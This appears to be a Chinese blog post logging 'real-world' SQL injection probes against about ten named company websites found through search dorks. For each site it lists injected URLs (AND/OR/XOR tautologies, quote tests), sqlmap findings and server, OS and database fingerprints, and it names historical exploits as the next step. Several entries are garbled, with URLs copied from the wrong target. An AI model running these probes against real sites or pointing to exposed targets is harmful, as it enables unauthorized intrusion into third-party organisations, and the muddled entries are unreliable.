记一次实战案例

1、目标：inurl:news.php?id=  

URL：https://www.lghk.com/news.php?id=5

网站标题：趋时珠宝首饰有限公司

手工基础判断：

And用法

and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

原始网页：https://www.lghk.com/news.php?id=5

构造url1：https://www.lghk.com/news.php?id=5 AND 1=1

         

构造url2：https://www.lghk.com/news.php?id=5 AND 1=2

如果url1访问结果跟原始网页一致，而url2跟原始网页不一致，有出错信息或者显示内容不一致，则证明存在SQL注入。

or用法：只要有一个为真，那么整条语句都是真

构造url1：https://www.lghk.com/news.php?id=5 or 1=1    正常页面只有News（会显示News, Awards & Cert.）

构造url2：https://www.lghk.com/news.php?id=5 or 1=2    正常页面只有News（会显示News, Awards & Cert.）

xor用法：同为真同为假，那就是假；一真一假才为真

构造url1：https://www.lghk.com/news.php?id=5 xor 1=1  （显示正常，全部数据都给）

构造url2：https://www.lghk.com/news.php?id=5 xor 1=2   （显示正常，全部数据都给）

字符串类型判断

单引号

构造url1：https://www.lghk.com/news.php?id=5’  （输入单引号会显示报错，后端代码可能有问题 ）

双引号

构造url1：https://www.lghk.com/news.php?id=”5”（显示页面正常 ）

Sqlmap检测：使用工具来跑可以看到存在多种注入，可以看到这个网站的应用信息，web应用技术：Nginx，PHP 7.4.33

后端DBMS:MySQL>=5.0（MariaDB fork）

2、目标：inurl:news.php?id=  

URL：http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题：西安夏溪科技

手工基础判断：

And用法

构造url1：http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 （显示空白页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 （显示报错页面这通常表示可能存在 SQL 注入漏洞）

or用法

构造url1：http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 （显示1的页面，页面页发生了变化）

字符串类型判断

单引号

构造url1：https://www.lghk.com/news.php?id=5’  （输入单引号会显示报错，后端代码可能有问题 ）

构造url2：http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 （页面没发生变化）

xor用法

构造url1：http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 （显示1的页面，页面页发生了变化）

构造url2：http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 （页面没发生了变化）

字符串类型判断

单引号

构造url1：http://www.xiatech.com.cn/aboutus.asp?id=3’  （输入单引号会显示报错，后端代码可能有问题 ）

双引号

构造url1：http://www.xiatech.com.cn/aboutus.asp?”id=”5”（显示错误 ）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

3、目标：inurl:news.php?id=  

URL：http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题：西安夏溪科技

手工基础判断：

And用法

构造url1：http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 （显示空白页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2（报错页面）

or用法

构造url1：http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1   or 1+=2（页面显示正常）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

操作系统Windows7 2012 r2 or 8.1

中间件是 PHP 5.4.45, Microsoft IIS 8.5

数据库是MySQL5.0

(知道这些信息我们可以查找历史漏洞进行下一步操作)

4、目标：inurl:asp?id=  

URL：http://www.jgbr.com.cn/ShowProduct.asp?ID=217

网站标题：江苏力星通用钢球股份有限公司

手工基础判断：

And用法

构造url1：http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 （显示空白页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2（报错页面）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

5、目标：inurl:asp?id=  

URL：http://www.hosen.cn/product.php?pid=500

网站标题：南京浩晃科技有限公司

手工基础判断：

And用法

构造url1：http://www.hosen.cn/product.php?pid=500 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.hosen.cn/product.php?pid=500 AND+1=2 （报错页面可能存在 SQL 注入漏洞）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

网站信息：PHP 5.4.26, Nginx

(知道这些信息我们可以查找历史漏洞进行下一步操作)

6、目标：inurl:asp?id=  

URL：http://www.cuc-china.net/about.asp?id=124

网站标题：世优认证 (上海)有限公司

手工基础判断：

And用法

构造url1：http://www.cuc-china.net/about.asp?id=124 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.cuc-china.net/about.asp?id=124 AND+1=2（报错页面可能存在 SQL 注入漏洞）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

web服务器操作系统：Windows 7或2008 R2

web应用技术：Microsoft IIS 7.5、ASP、ASP。NET

后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

7、目标：inurl:asp?id=  

URL：http://www.ywbaili.com/news.php?id=1

网站标题：百利飞镖

手工基础判断：

And用法

构造url1：http://www.ywbaili.com/news.php?id=1 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.ywbaili.com/news.php?id=1 AND+1=2 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

web服务器操作系统：Windows XP或2003

web应用技术：ASP.NET、Microsoft IIS 6.0

后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

8、目标：inurl:news.php?id=  

URL：https://www.szdwwy.com/service_show.php?id=2

网站标题：东吴服务产业集团 (江苏) 有限公司

And用法

构造url1：https://www.szdwwy.com/service_show.php?id=2 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.ywbaili.com/news.php?id=1 AND+1=2 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

后端DBMS是MySQL

web应用程序技术：Apache

后端DBMS:MySQL>=5.0.12

(知道这些信息我们可以查找历史漏洞进行下一步操作)

9、目标：inurl:news.php?id=  

URL：http://www.icet.org.cn/news.asp?id=367

网站标题：能源与交通创新中心

And用法

构造url1：http://www.icet.org.cn/news.asp?id=367 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.icet.org.cn/news.asp?id=367 AND+1=2 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

web服务器操作系统：Windows 2012或8

web应用程序技术：Microsoft IIS 8.0、ASP.NET、ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

10、目标：inurl:band_info.php?id=  

URL：http://www.fine-stamping.com/contact.asp?id=10

网站标题：苏州范斯特机械科技有限公司

And用法

构造url1：http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 （显示正常页面这通常表示可能存在 SQL 注入漏洞）

构造url2：http://www.fine-stamping.com/contact.asp?id=10 AND+1=2（显示正常页面这通常表示可能存在 SQL 注入漏洞）

字节符

构造url2：http://www.fine-stamping.com/contact.asp?id=10’（显示报错）

 

Sqlmap检测：使用工具来跑可以看到存在sql注入，可以看到这个网站的应用信息

web服务器操作系统：Windows

web应用技术：ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

问题：1  

URL：http://www.syyqz.com/lianxi.php?pid=6&id=6

手工测试是有漏洞，但是使用sqlmap跑也是有注入点，但是就是跑不出数据库信息

问题：2  

URL：http://www.isriht.com/index.php?id=344

输入了and 1=1 显示下图这样的操作